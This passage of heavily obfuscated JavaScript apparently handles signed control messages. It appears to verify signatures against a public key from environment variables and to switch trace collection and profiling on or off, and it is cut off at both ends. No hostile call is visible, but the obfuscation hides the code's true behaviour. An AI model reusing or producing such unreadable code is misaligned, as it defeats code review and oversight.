x74\x64\x55\x78\x50\x57','\x57\x34\x4c\x37\x57\x50\x70\x64\x4a\x43\x6f\x48\x63\x38\x6b\x75\x57\x50\x68\x64\x48\x43\x6f\x38\x6c\x43\x6b\x56\x57\x37\x53','\x57\x36\x58\x67\x42\x6d\x6f\x77\x44\x57\x4b','\x64\x78\x65\x31\x57\x52\x64\x64\x56\x71','\x6f\x47\x78\x63\x55\x31\x30\x4c','\x76\x61\x4a\x64\x53\x48\x30','\x57\x52\x61\x49\x77\x53\x6b\x63\x6b\x53\x6b\x58\x6c\x43\x6f\x31','\x57\x37\x6c\x64\x4e\x72\x5a\x63\x4f\x77\x33\x63\x50\x61\x74\x64\x56\x57','\x57\x51\x70\x63\x4a\x43\x6b\x54\x57\x52\x34\x78','\x6a\x38\x6f\x4e\x68\x53\x6f\x46\x57\x35\x4c\x58\x6d\x33\x65','\x57\x50\x38\x51\x57\x52\x69','\x6e\x43\x6b\x47\x42\x53\x6b\x44\x63\x66\x56\x64\x52\x71','\x46\x6d\x6f\x39\x63\x68\x4e\x63\x4e\x30\x35\x57\x57\x52\x38','\x57\x37\x64\x63\x55\x33\x64\x63\x54\x47','\x69\x33\x34\x33','\x65\x63\x42\x63\x4d\x31\x38\x68','\x65\x5a\x4c\x2f\x57\x4f\x52\x63\x52\x71','\x65\x5a\x56\x63\x47\x4b\x6d','\x57\x35\x68\x63\x4d\x4d\x37\x64\x51\x63\x57','\x42\x72\x66\x4e\x57\x37\x4b\x67\x57\x34\x48\x6b\x70\x57','\x70\x4e\x38\x7a\x57\x51\x42\x64\x4b\x65\x50\x38\x57\x35\x30','\x66\x38\x6b\x6c\x57\x4f\x78\x63\x4b\x74\x30\x4f\x57\x35\x38\x6c','\x57\x52\x6c\x64\x53\x32\x4e\x63\x54\x32\x47','\x6a\x6d\x6f\x47\x62\x38\x6f\x65\x57\x34\x69','\x42\x43\x6b\x77\x68\x61\x4a\x64\x48\x47\x2f\x63\x4e\x53\x6b\x44','\x57\x50\x53\x2b\x57\x35\x4e\x63\x48\x6d\x6b\x4b\x78\x61','\x57\x50\x71\x6a\x46\x38\x6f\x61\x65\x71','\x57\x4f\x61\x55\x77\x38\x6f\x72\x63\x57','\x57\x52\x53\x2f\x57\x4f\x52\x63\x4d\x65\x69','\x57\x51\x7a\x6d\x57\x37\x75\x74\x57\x52\x42\x64\x55\x4d\x74\x64\x47\x61','\x63\x4a\x70\x63\x47\x65\x61\x5a\x73\x6d\x6b\x62\x57\x50\x79','\x57\x36\x44\x56\x57\x51\x35\x73\x57\x37\x75','\x57\x4f\x30\x2f\x57\x34\x78\x64\x4c\x6d\x6b\x47\x77\x53\x6f\x69\x57\x51\x53','\x68\x75\x2f\x63\x56\x48\x74\x64\x55\x57','\x57\x34\x6c\x64\x56\x6d\x6f\x53\x57\x35\x66\x39\x6f\x62\x2f\x63\x56\x57','\x66\x53\x6f\x54\x74\x63\x30','\x44\x71\x66\x52\x57\x35\x75','\x6d\x6d\x6b\x2f\x62\x78\x4a\x64\x55\x57','\x68\x53\x6f\x71\x43\x64\x68\x63\x4e\x38\x6b\x32\x67\x47','\x65\x65\x72\x75\x46\x43\x6b\x4f','\x79\x4e\x61\x56\x57\x51\x30','\x72\x30\x47\x31\x57\x34\x56\x64\x4a\x53\x6b\x6e\x57\x4f\x65\x4e\x57\x35\x50\x71\x63\x43\x6f\x34\x6d\x47','\x67\x43\x6b\x67\x57\x50\x4f','\x57\x37\x6d\x48\x57\x52\x66\x63\x57\x36\x33\x64\x50\x4d\x4a\x64\x52\x6d\x6b\x35\x57\x52\x48\x4a','\x76\x32\x6c\x64\x4e\x48\x44\x34\x68\x6d\x6f\x43\x57\x37\x62\x4e\x57\x4f\x50\x45\x66\x76\x43','\x64\x66\x39\x77\x43\x53\x6b\x31\x57\x51\x56\x64\x4c\x43\x6f\x64','\x57\x4f\x4b\x6f\x57\x51\x5a\x63\x4e\x4d\x75','\x57\x36\x62\x37\x57\x50\x50\x79\x57\x34\x47\x41\x57\x51\x79','\x41\x48\x4e\x64\x4a\x48\x43\x51','\x67\x43\x6b\x67\x57\x50\x74\x63\x4f\x64\x30\x51\x57\x36\x72\x63','\x57\x35\x37\x63\x55\x32\x74\x64\x52\x38\x6f\x33\x71\x6d\x6f\x43\x57\x36\x75','\x65\x77\x72\x73\x57\x4f\x65\x56','\x69\x38\x6b\x72\x57\x4f\x70\x63\x47\x4a\x65\x48\x57\x51\x39\x69','\x57\x4f\x4f\x48\x57\x52\x71','\x65\x53\x6b\x39\x57\x50\x70\x63\x4b\x72\x65','\x65\x30\x58\x44','\x57\x51\x33\x64\x4b\x68\x64\x63\x51\x30\x43','\x6d\x6d\x6f\x69\x78\x57\x5a\x64\x4f\x57\x4e\x63\x54\x6d\x6f\x36\x57\x37\x38','\x72\x76\x30\x4c\x57\x52\x68\x64\x50\x61','\x78\x48\x78\x64\x55\x47','\x57\x35\x4a\x64\x50\x38\x6f\x32\x57\x34\x31\x56\x6a\x61\x5a\x63\x50\x53\x6b\x58\x77\x38\x6f\x76\x79\x38\x6b\x41\x57\x36\x57','\x67\x4b\x37\x63\x4f\x38\x6b\x6c\x68\x6d\x6f\x55','\x57\x37\x46\x63\x48\x43\x6b\x49','\x64\x77\x79\x47\x46\x6d\x6b\x41\x73\x38\x6f\x68\x6a\x61','\x57\x37\x53\x51\x57\x4f\x58\x47\x67\x61','\x57\x35\x6d\x37\x57\x36\x44\x34\x6c\x47','\x57\x4f\x44\x5a\x69\x47\x78\x63\x4c\x6d\x6b\x2b\x64\x6d\x6b\x47'];_0x48cd=function(){return _0x29e9ea;};return _0x48cd();}const _0x1e8502=require(_0x5e367f(0x1ce,'\x69\x45\x32\x50'));function _0x407201(_0x136c89={}){const _0x271734=_0x5e367f,_0x300f2d={};_0x300f2d[_0x271734(0x26d,'\x4d\x24\x6b\x69')]=_0x271734(0x213,'\x74\x66\x4c\x77')+_0x271734(0x26f,'\x73\x59\x33\x36')+'\x69\x67\x6e\x6f\x72\x69\x6e\x67'+_0x271734(0x212,'\x4e\x41\x70\x42')+_0x271734(0x26e,'\x38\x65\x61\x38')+_0x271734(0x22d,'\x56\x71\x36\x30')+_0x271734(0x1c0,'\x35\x63\x32\x74'),_0x300f2d['\x76\x6d\x64\x6c\x52']=function(_0x14c1e4,_0x59ff0d){return _0x14c1e4!==_0x59ff0d;},_0x300f2d[_0x271734(0x19b,'\x59\x28\x73\x48')]=_0x271734(0x1ed,'\x28\x6d\x72\x64'),_0x300f2d[_0x271734(0x1a2,'\x51\x53\x6c\x42')]=_0x271734(0x219,'\x47\x61\x33\x39')+'\x65',_0x300f2d[_0x271734(0x1eb,'\x43\x58\x6d\x70')]=function(_0x25046f,_0x3e525b){return _0x25046f===_0x3e525b;},_0x300f2d[_0x271734(0x284,'\x52\x77\x4f\x78')]=_0x271734(0x265,'\x34\x4f\x4f\x46')+_0x271734(0x179,'\x6f\x35\x68\x64')+_0x271734(0x1b7,'\x4e\x41\x70\x42'),_0x300f2d[_0x271734(0x294,'\x6c\x70\x4e\x74')]=_0x271734(0x219,'\x47\x61\x33\x39')+'\x65\x5f\x61\x6c\x67\x6f\x72\x69'+_0x271734(0x1ea,'\x38\x65\x61\x38'),_0x300f2d[_0x271734(0x187,'\x6b\x25\x59\x32')]=_0x271734(0x224,'\x48\x29\x6c\x74')+_0x271734(0x182,'\x35\x23\x6d\x29'),_0x300f2d[_0x271734(0x256,'\x73\x6c\x79\x54')]=function(_0x2fa229,_0x19b233){return _0x2fa229!==_0x19b233;};const _0x177148=_0x300f2d,_0x2fa9e3={};for(const _0x74bffb of Object[_0x271734(0x26a,'\x42\x65\x66\x42')](_0x136c89)[_0x271734(0x184,'\x4c\x38\x58\x59')]()){if(_0x177148[_0x271734(0x27b,'\x76\x40\x74\x4a')](_0x177148[_0x271734(0x1fa,'\x6b\x25\x59\x32')],_0x177148[_0x271734(0x1c7,'\x70\x6d\x73\x52')])){this[_0x271734(0x214,'\x48\x29\x6c\x74')][_0x271734(0x1dd,'\x38\x39\x24\x69')]?.(_0x177148[_0x271734(0x24d,'\x35\x63\x32\x74')]);const _0x41c1a6={};return _0x41c1a6[_0x271734(0x1f3,'\x54\x43\x5e\x34')]=!![],_0x41c1a6[_0x271734(0x24b,'\x76\x40\x74\x4a')]=![],_0x41c1a6;}else{if(_0x74bffb===_0x177148[_0x271734(0x1d0,'\x55\x47\x5d\x39')]||_0x177148[_0x271734(0x1ad,'\x70\x6d\x73\x52')](_0x74bffb,_0x177148['\x6e\x47\x79\x75\x6f'])||_0x74bffb===_0x177148[_0x271734(0x23e,'\x45\x56\x78\x26')])continue;if(_0x74bffb===_0x177148[_0x271734(0x206,'\x35\x23\x6d\x29')])continue;const _0x20edb3=_0x136c89[_0x74bffb];if(_0x177148['\x7a\x50\x73\x77\x76'](_0x20edb3,undefined))_0x2fa9e3[_0x74bffb]=_0x20edb3;}}return JSON[_0x271734(0x1f8,'\x56\x71\x36\x30')+'\x79'](_0x2fa9e3);}function _0x29a9d1(_0x4ddc96={},_0x362b8d=process.env){const _0x22e71a=_0x5e367f,_0x129d06={'\x49\x59\x69\x41\x41':function(_0x312ba2,_0x18677b){return _0x312ba2(_0x18677b);},'\x5a\x64\x62\x79\x72':_0x22e71a(0x1fd,'\x69\x45\x32\x50'),'\x4d\x61\x41\x74\x73':_0x22e71a(0x25a,'\x7a\x6d\x29\x21'),'\x6c\x51\x58\x59\x63':_0x22e71a(0x1c2,'\x4b\x74\x28\x51'),'\x6e\x6d\x6b\x64\x42':_0x22e71a(0x297,'\x38\x65\x61\x38')},_0x304700=_0x129d06[_0x22e71a(0x1bd,'\x7a\x6d\x29\x21')](String,_0x362b8d[_0x22e71a(0x23b,'\x52\x77\x4f\x78')+_0x22e71a(0x1a7,'\x46\x64\x44\x26')+_0x22e71a(0x19e,'\x47\x61\x33\x39')+_0x22e71a(0x293,'\x55\x47\x5d\x39')+_0x22e71a(0x1f2,'\x47\x61\x33\x39')]||_0x362b8d[_0x22e71a(0x290,'\x58\x24\x5d\x39')+_0x22e71a(0x16f,'\x51\x53\x6c\x42')+_0x22e71a(0x18a,'\x46\x64\x44\x26')+_0x22e71a(0x18e,'\x51\x53\x6c\x42')+'\x47\x5f\x50\x55\x42\x4c\x49\x43'+_0x22e71a(0x1d8,'\x68\x59\x51\x33')]||'')['\x74\x72\x69\x6d'](),_0xc40ef5=_0x129d06[_0x22e71a(0x21a,'\x48\x29\x6c\x74')](String,_0x4ddc96[_0x22e71a(0x28b,'\x47\x65\x67\x47')+'\x65']||_0x4ddc96[_0x22e71a(0x292,'\x55\x28\x66\x4c')+_0x22e71a(0x1f7,'\x76\x40\x74\x4a')+_0x22e71a(0x220,'\x7a\x6d\x29\x21')]||'')[_0x22e71a(0x28e,'\x68\x59\x51\x33')]();if(!_0x304700||!_0xc40ef5)return![];try{return _0x129d06[_0x22e71a(0x1af,'\x47\x61\x33\x39')]!==_0x129d06[_0x22e71a(0x283,'\x56\x71\x36\x30')]?![]:_0x1e8502[_0x22e71a(0x274,'\x45\x56\x78\x26')](_0x129d06[_0x22e71a(0x17f,'\x59\x28\x73\x48')],Buffer[_0x22e71a(0x200,'\x73\x6c\x79\x54')](_0x407201(_0x4ddc96),_0x129d06[_0x22e71a(0x172,'\x4f\x57\x49\x68')]),_0x304700,Buffer[_0x22e71a(0x1ba,'\x6c\x70\x4e\x74')](_0xc40ef5,_0x129d06[_0x22e71a(0x24f,'\x48\x29\x6c\x74')]));}catch{return![];}}class _0x335831{constructor({store:_0x3743fd,logger:_0x588085}={}){const _0x4d6355=_0x5e367f,_0x6fdf79={};_0x6fdf79[_0x4d6355(0x1a8,'\x58\x24\x5d\x39')]=function(_0x2b1caa,_0x2d12e5){return _0x2b1caa||_0x2d12e5;};const _0x3b72ad=_0x6fdf79;this[_0x4d6355(0x20c,'\x51\x53\x6c\x42')]=_0x3743fd,this[_0x4d6355(0x1a3,'\x4e\x41\x70\x42')]=_0x3b72ad[_0x4d6355(0x1e5,'\x6c\x70\x4e\x74')](_0x588085,console);}[_0x5e367f(0x20b,'\x73\x6a\x69\x4b')](_0x62fd7){const _0x22c979=_0x5e367f,_0x26c106={};_0x26c106[_0x22c979(0x191,'\x68\x59\x51\x33')]=_0x22c979(0x1e9,'\x43\x58\x6d\x70')+_0x22c979(0x1cd,'\x34\x40\x67\x68')+_0x22c979(0x205,'\x46\x64\x44\x26')+_0x22c979(0x279,'\x45\x56\x78\x26')+_0x22c979(0x28d,'\x70\x6d\x73\x52')+_0x22c979(0x211,'\x38\x39\x24\x69')+_0x22c979(0x1bb,'\x55\x47\x5d\x39')+_0x22c979(0x298,'\x55\x47\x5d\x39')+_0x22c979(0x1a9,'\x45\x56\x78\x26')+_0x22c979(0x1c1,'\x47\x65\x67\x47')+_0x22c979(0x1b1,'\x35\x63\x32\x74')+_0x22c979(0x1d9,'\x59\x28\x73\x48'),_0x26c106['\x4b\x67\x47\x6a\x4c']=_0x22c979(0x26c,'\x76\x58\x72\x32')+_0x22c979(0x241,'\x4b\x74\x28\x51')+_0x22c979(0x275,'\x47\x61\x33\x39'),_0x26c106[_0x22c979(0x197,'\x58\x24\x5d\x39')]=_0x22c979(0x250,'\x46\x58\x72\x76')+_0x22c979(0x1c8,'\x59\x28\x73\x48')+'\x69\x67',_0x26c106[_0x22c979(0x186,'\x33\x72\x38\x64')]=function(_0x2934ff,_0x8ae4f0){return _0x2934ff===_0x8ae4f0;},_0x26c106[_0x22c979(0x291,'\x2a\x25\x61\x26')]=function(_0x2635bc,_0x555a77){return _0x2635bc===_0x555a77;},_0x26c106[_0x22c979(0x217,'\x42\x65\x66\x42')]=function(_0x1901ed,_0x7e1665){return _0x1901ed!==_0x7e1665;},_0x26c106[_0x22c979(0x231,'\x46\x64\x44\x26')]=function(_0x4c6a35,_0x1ae18c){return _0x4c6a35===_0x1ae18c;},_0x26c106[_0x22c979(0x1b8,'\x74\x66\x4c\x77')]='\x73\x74\x72\x69\x6e\x67',_0x26c106['\x62\x6c\x44\x65\x4f']=function(_0x5c982e,_0x2e863b){return _0x5c982e&&_0x2e863b;},_0x26c106[_0x22c979(0x21b,'\x4b\x74\x28\x51')]=_0x22c979(0x296,'\x4e\x41\x70\x42'),_0x26c106['\x46\x4e\x62\x46\x52']=_0x22c979(0x27e,'\x35\x23\x6d\x29')+_0x22c979(0x1ca,'\x43\x58\x6d\x70')+_0x22c979(0x1d3,'\x40\x4d\x50\x68')+'\x75\x6e\x73\x69\x67\x6e\x65\x64'+'\x20\x70\x72\x6f\x66\x69\x6c\x65'+_0x22c979(0x246,'\x38\x39\x24\x69')+'\x73\x20\x65\x6e\x61\x62\x6c\x65'+_0x22c979(0x253,'\x73\x6c\x79\x54')+_0x22c979(0x180,'\x55\x47\x5d\x39')+_0x22c979(0x272,'\x70\x6d\x73\x52')+_0x22c979(0x17d,'\x33\x72\x38\x64'),_0x26c106[_0x22c979(0x249,'\x73\x59\x33\x36')]=_0x22c979(0x199,'\x54\x43\x5e\x34')+_0x22c979(0x208,'\x58\x24\x5d\x39')+_0x22c979(0x1fb,'\x6f\x35\x68\x64'),_0x26c106[_0x22c979(0x1aa,'\x76\x40\x74\x4a')]=_0x22c979(0x210,'\x48\x29\x6c\x74'),_0x26c106[_0x22c979(0x260,'\x46\x64\x44\x26')]=_0x22c979(0x1da,'\x61\x5b\x48\x61'),_0x26c106[_0x22c979(0x1ae,'\x73\x6a\x69\x4b')]='\x68\x63\x42\x79\x53',_0x26c106[_0x22c979(0x1ef,'\x38\x39\x24\x69')]=_0x22c979(0x252,'\x6f\x35\x68\x64')+_0x22c979(0x1fc,'\x52\x77\x4f\x78')+'\x69\x67\x6e\x6f\x72\x65\x64\x20'+_0x22c979(0x247,'\x55\x47\x5d\x39')+_0x22c979(0x288,'\x34\x40\x67\x68')+_0x22c979(0x20f,'\x43\x58\x6d\x70')+_0x22c979(0x1d5,'\x69\x45\x32\x50')+_0x22c979(0x192,'\x40\x4d\x50\x68')+_0x22c979(0x270,'\x74\x72\x4a\x65')+_0x22c979(0x242,'\x54\x36\x61\x39')+'\x42\x5f\x50\x55\x42\x4c\x49\x43'+'\x5f\x4b\x45\x59',_0x26c106[_0x22c979(0x16e,'\x4c\x38\x58\x59')]=_0x22c979(0x27a,'\x46\x58\x72\x76')+_0x22c979(0x1f4,'\x73\x6c\x79\x54')+_0x22c979(0x188,'\x48\x29\x6c\x74')+'\x5f\x61\x74',_0x26c106[_0x22c979(0x1a5,'\x76\x40\x74\x4a')]=_0x22c979(0x1e7,'\x4b\x74\x28\x51')+_0x22c979(0x18f,'\x7a\x6d\x29\x21')+'\x74\x72\x61\x63\x65\x20\x63\x6f'+'\x6c\x6c\x65\x63\x74\x69\x6f\x6e'+'\x20',_0x26c106[_0x22c979(0x1e3,'\x38\x65\x61\x38')]=_0x22c979(0x226,'\x76\x6c\x59\x31'),_0x26c106[_0x22c979(0x258,'\x51\x53\x6c\x42')]=_0x22c979(0x21d,'\x4d\x24\x6b\x69');const _0x12f9f6=_0x26c106,_0x22829c=_0x62fd7&&_0x62fd7[_0x22c979(0x25d,'\x4c\x38\x58\x59')]?_0x62fd7['\x70\x61\x79\x6c\x6f\x61\x64']:_0x62fd7,_0x50ca6b=_0x22829c&&(_0x22829c[_0x22c979(0x23d,'\x35\x23\x6d\x29')]??_0x22829c['\x74\x72\x61\x63\x65\x5f\x63\x6f'+_0x22c979(0x282,'\x48\x29\x6c\x74')+_0x22c979(0x239,'\x40\x4d\x50\x68')]??_0x22829c[_0x22c979(0x1b3,'\x56\x71\x36\x30')+'\x61\x63\x65\x5f\x63\x6f\x6c\x6c'+'\x65\x63\x74\x69\x6f\x6e\x5f\x65'+_0x22c979(0x21c,'\x56\x71\x36\x30')]);if(_0x12f9f6[_0x22c979(0x245,'\x55\x47\x5d\x39')](typeof _0x50ca6b,_0x22c979(0x268,'\x43\x58\x6d\x70'))){this['\x6c\x6f\x67\x67\x65\x72']['\x77\x61\x72\x6e']?.(_0x22c979(0x257,'\x76\x40\x74\x4a')+'\x6f\x6e\x74\x72\x6f\x6c\x5d\x20'+_0x22c979(0x259,'\x51\x53\x6c\x42')+_0x22c979(0x26b,'\x34\x4f\x4f\x46')+'\x77\x69\x74\x68\x6f\x75\x74\x20'+_0x22c979(0x19a,'\x76\x6c\x59\x31')+'\x65\x6e\x61\x62\x6c\x65\x64');const _0x380d79={};return _0x380d79[_0x22c979(0x1bf,'\x38\x65\x61\x38')]=!![],_0x380d79[_0x22c979(0x22e,'\x34\x4f\x4f\x46')]=![],_0x380d79;}let _0x22afa7=_0x22829c[_0x22c979(0x1e2,'\x4c\x38\x58\x59')+_0x22c979(0x203,'\x68\x59\x51\x33')+_0x22c979(0x278,'\x70\x6d\x73\x52')]??_0x22829c[_0x22c979(0x223,'\x35\x63\x32\x74')+_0x22c979(0x232,'\x58\x24\x5d\x39')+_0x22c979(0x1a0,'\x47\x61\x33\x39')+_0x22c979(0x20a,'\x55\x47\x5d\x39')];const _0x3b6647=_0x29a9d1(_0x22829c),_0x13c2ca=_0x12f9f6[_0x22c979(0x1c5,'\x34\x4f\x4f\x46')](_0x50ca6b,!![]),_0x52bdd5=_0x12f9f6[_0x22c979(0x196,'\x74\x72\x4a\x65')](_0x22afa7,!![]),_0x1ba9f5=_0x12f9f6[_0x22c979(0x1b9,'\x40\x4d\x50\x68')](typeof _0x22829c[_0x22c979(0x190,'\x6c\x70\x4e\x74')+_0x22c979(0x183,'\x28\x6d\x72\x64')],_0x12f9f6['\x47\x61\x65\x45\x62'])&&_0x22829c[_0x22c979(0x173,'\x35\x23\x6d\x29')+_0x22c979(0x229,'\x38\x65\x61\x38')][_0x22c979(0x27c,'\x38\x39\x24\x69')]();if(_0x12f9f6[_0x22c979(0x22c,'\x33\x72\x38\x64')](!_0x3b6647,_0x13c2ca)){if(_0x12f9f6[_0x22c979(0x222,'\x74\x66\x4c\x77')](_0x12f9f6[_0x22c979(0x271,'\x4a\x28\x69\x68')],_0x22c979(0x19f,'\x47\x61\x33\x39'))){this[_0x22c979(0x17b,'\x46\x64\x44\x26')][_0x22c979(0x244,'\x73\x6a\x69\x4b')]?.(_0x22c979(0x251,'\x73\x6c\x79\x54')+_0x22c979(0x1be,'\x56\x71\x36\x30')+'\x72\x65\x6a\x65\x63\x74\x65\x64'+_0x22c979(0x19c,'\x61\x5b\x48\x61')+'\x64\x20\x74\x72\x61\x63\x65\x20'+_0x22c979(0x20e,'\x58\x24\x5d\x39')+_0x22c979(0x198,'\x73\x6c\x79\x54')+_0x22c979(0x23f,'\x34\x40\x67\x68')+_0x22c979(0x209,'\x58\x24\x5d\x39')+'\x69\x6f\x6e\x2f\x70\x72\x6f\x66'+_0x22c979(0x1a1,'\x43\x58\x6d\x70')+_0x22c979(0x1b2,'\x68\x59\x51\x33'));const _0x563890={};return _0x563890['\x61\x63\x6b']=!![],_0x563890[_0x22c979(0x273,'\x38\x39\x24\x69')]=![],_0x563890;}else{this[_0x22c979(0x20d,'\x38\x39\x24\x69')][_0x22c979(0x254,'\x58\x24\x5d\x39')]?.(_0x12f9f6[_0x22c979(0x19d,'\x4a\x28\x69\x68')]);const _0x25269d={};return _0x25269d[_0x22c979(0x22f,'\x74\x72\x4a\x65')]=!![],_0x25269d['\x61\x70\x70\x6c\x69\x65\x64']=![],_0x25269d;}}_0x12f9f6[_0x22c979(0x1d4,'\x45\x56\x78\x26')](!_0x3b6647,_0x52bdd5)&&(this[_0x22c979(0x1fe,'\x55\x47\x5d\x39')][_0x22c979(0x21e,'\x68\x59\x51\x33')]?.(_0x12f9f6[_0x22c979(0x266,'\x54\x43\x5e\x34')]),_0x22afa7=![]);this['\x73\x74\x6f\x72\x65'][_0x22c979(0x29a,'\x55\x47\x5d\x39')](_0x12f9f6[_0x22c979(0x215,'\x52\x77\x4f\x78')],_0x50ca6b?_0x12f9f6[_0x22c979(0x1c4,'\x40\x4d\x50\x68')]:_0x12f9f6[_0x22c979(0x255,'\x55\x47\x5d\x39')]);if(_0x12f9f6['\x59\x51\x55\x72\x64'](typeof _0x22afa7,_0x22c979(0x28f,'\x34\x40\x67\x68'))){if(_0x12f9f6[_0x22c979(0x280,'\x76\x6c\x59\x31')](_0x22c979(0x1e8,'\x58\x24\x5d\x39'),_0x12f9f6[_0x22c979(0x1f6,'\x6b\x25\x59\x32')]))this[_0x22c979(0x1d6,'\x74\x72\x4a\x65')][_0x22c979(0x276,'\x69\x45\x32\x50')]('\x74\x72\x61\x63\x65\x5f\x70\x72'+_0x22c979(0x202,'\x40\x4d\x50\x68')+_0x22c979(0x24e,'\x58\x24\x5d\x39')+'\x6e\x61\x62\x6c\x65\x64',_0x22afa7?_0x12f9f6[_0x22c979(0x27f,'\x4d\x24\x6b\x69')]:_0x12f9f6[_0x22c979(0x240,'\x51\x53\x6c\x42')]);else{const _0xc876b2={};_0xc876b2[_0x22c979(0x174,'\x61\x5b\x48\x61')]=_0x12f9f6['\x4b\x67\x47\x6a\x4c'],_0xc876b2[_0x22c979(0x1dc,'\x4c\x38\x58\x59')]=0x32;const _0x1de92d={};_0x1de92d[_0x22c979(0x204,'\x45\x56\x78\x26')]=_0x12f9f6[_0x22c979(0x1f5,'\x4f\x57\x49\x68')],_0x1de92d[_0x22c979(0x1dc,'\x4c\x38\x58\x59')]=0x32;const _0x105ef3=[...this[_0x22c979(0x201,'\x76\x40\x74\x4a')][_0x22c979(0x181,'\x33\x72\x38\x64')](_0xc876b2),...this['\x73\x74\x6f\x72\x65'][_0x22c979(0x1c6,'\x40\x4d\x50\x68')](_0x1de92d)];let _0x33e898=-0x23f+0x55*-0x5+0x3e8;for(const _0x3b67cb of _0x105ef3){const _0x4cfe1a=this['\x70\x72\x6f\x63\x65\x73\x73'](_0x3b67cb),_0xce8c0=_0x12f9f6[_0x22c979(0x1b4,'\x69\x45\x32\x50')](_0x4cfe1a,!![])||_0x4cfe1a&&_0x12f9f6[_0x22c979(0x237,'\x2a\x25\x61\x26')](_0x4cfe1a[_0x22c979(0x25c,'\x4b\x74\x28\x51')],!![]),_0x359eb1=_0x12f9f6[_0x22c979(0x261,'\x76\x58\x72\x32')](_0x4cfe1a,!![])||_0x4cfe1a&&_0x12f9f6[_0x22c979(0x285,'\x6b\x25\x59\x32')](_0x4cfe1a[_0x22c979(0x193,'\x47\x65\x67\x47')],!![]);_0xce8c0&&this[_0x22c979(0x201,'\x76\x40\x74\x4a')][_0x22c979(0x1df,'\x43\x58\x6d\x70')](_0x3b67cb['\x69\x64']),_0x359eb1&&_0x33e898++;}return _0x33e898;}}_0x1ba9f5&&this['\x6c\x6f\x67\x67\x65\x72'][_0x22c979(0x216,'\x34\x40\x67\x68')]?.(_0x12f9f6[_0x22c979(0x1ef,'\x38\x39\x24\x69')]);this['\x73\x74\x6f\x72\x65'][_0x22c979(0x1bc,'\x73\x6a\x69\x4b')](_0x12f9f6[_0x22c979(0x230,'\x46\x58\x72\x76')],new Date()[_0x22c979(0x1c9,'\x74\x66\x4c\x77')+_0x22c979(0x1c3,'\x74\x66\x4c\x77')]()),this['\x6c\x6f\x67\x67\x65\x72'][_0x22c979(0x1f0,'\x6c\x70\x4e\x74')]?.(_0x12f9f6[_0x22c979(0x221,'\x38\x65\x61\x38')]+(_0x50ca6b?_0x12f9f6[_0x22c979(0x17c,'\x59\x28\x73\x48')]:_0x12f9f6[_0x22c979(0x1ac,'\x73\x59\x33\x36')]));const _0x284fe6={};return _0x284fe6['\x61\x63\x6b']=!![],_0x284fe6[_0x22c979(0x22e,'\x34\x4f\x4f\x46')]=!![],_0x284fe6;}[_0x5e367f(0x189,'\x55\x28\x66\x4c')+_0x5e367f(0x233,'\x35\x23\x6d\x29')](){const _0x37497f=_0x5e367f,_0x3449dc={};_0x3449dc['\x73\x50\x70\x54\x4f']=_0x37497f(0x27d,'\x73\x6c\x79\x54')+_0x37497f(0x29b,'\x7a\x6d\x29\x21')+_0x37497f(0x295,'\x4b\x74\x28\x51'),_0x3449dc[_0x37497f(0x289,'\x35\x23\x6d\x29')]=_0x37497f(0x25b,'\x58\x24\x5d\x39')+_0x37497f(0x24a,'\x56\x71\x36\x30')+'\x69\x67',_0x3449dc['\x46\x6d\x53\x68\x43']=function(_0x37c6e7,_0x28bfae){return _0x37c6e7===_0x28bfae;},_0x3449dc[_0x37497f(0x28c,'\x4e\x41\x70\x42')]=function(_0x4bf2ee,_0xf17562){return _0x4bf2ee===_0xf17562;},_0x3449dc['\x77\x75\x69\x6d\x72']=function(_0x56dcbd,_0x2f7979){return _0x56dcbd!==_0x2f7979;},_0x3449dc['\x42\x4d\x71\x54\x46']=_0x37497f(0x175,'\x4e\x41\x70\x42');const _0x263775=_0x3449dc,_0x336ce6={};_0x336ce6['\x74\x79\x70\x65']=_0x263775[_0x37497f(0x18c,'\x70\x6d\x73\x52')],_0x336ce6[_0x37497f(0x1dc,'\x4c\x38\x58\x59')]=0x32;const _0x5bd03d={};_0x5bd03d[_0x37497f(0x234,'\x48\x29\x6c\x74')]=_0x263775[_0x37497f(0x18b,'\x46\x58\x72\x76')],_0x5bd03d[_0x37497f(0x1cc,'\x56\x71\x36\x30')]=0x32;const _0x2209a5=[...this[_0x37497f(0x28a,'\x26\x4e\x45\x63')][_0x37497f(0x228,'\x76\x58\x72\x32')](_0x336ce6),...this[_0x37497f(0x201,'\x76\x40\x74\x4a')][_0x37497f(0x1b0,'\x76\x6c\x59\x31')](_0x5bd03d)];let _0x545d5c=0x1*-0x349+-0xb17*0x1+0x50*0x2e;for(const _0x214b1a of _0x2209a5){const _0x852311=this['\x70\x72\x6f\x63\x65\x73\x73'](_0x214b1a),_0x18a39c=_0x263775[_0x37497f(0x22b,'\x69\x45\x32\x50')](_0x852311,!![])||_0x852311&&_0x263775[_0x37497f(0x1cb,'\x28\x6d\x72\x64')](_0x852311[_0x37497f(0x194,'\x51\x53\x6c\x42')],!![]),_0x590ca8=_0x263775['\x46\x6d\x53\x68\x43'](_0x852311,!![])||_0x852311&&_0x263775['\x55\x53\x47\x73\x6a'](_0x852311[_0x37497f(0x25f,'\x6c\x70\x4e\x74')],!![]);_0x18a39c&&(_0x263775['\x77\x75\x69\x6d\x72'](_0x263775['\x42\x4d\x71\x54\x46'],'\x6b\x43\x4a\x44\x66')?_0x44d782++:this[_0x37497f(0x20c,'\x51\x53\x6c\x42')][_0x37497f(0x1f9,'\x76\x6c\x59\x31')](_0x214b1a['\x69\x64'])),_0x590ca8&&_0x545d5c++;}return _0x545d5c;}}const _0xc18f10={};function _0x23c3(_0x5c2516,_0x405656){_0x5c2516=_0x5c2516-(0x1b7f+-0x1dbb+0x43*0xe);const _0x48a266=_0x48cd();let _0x5ec3eb=_0x48a266[_0x5c2516];if(_0x23c3['\x4c\x58\x70\x47\x69\x71']===undefined){var _0x4d2949=function(_0x54de54){const _0x161189='\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2b\x2f\x3d';let _0x1aa032='',_0x4f49c9='',_0xaaa5dc=_0x1aa032+_0x4d2949,_0x408153=(''+function(){return-0x253e+0xad3*-0x1+0x3011;})['\x69\x6e\x64\x65\x78\x4f\x66']('\x0a')!==-(-0x503*-0x2+0x5ab*0x1+0x10*-0xfb);for(let 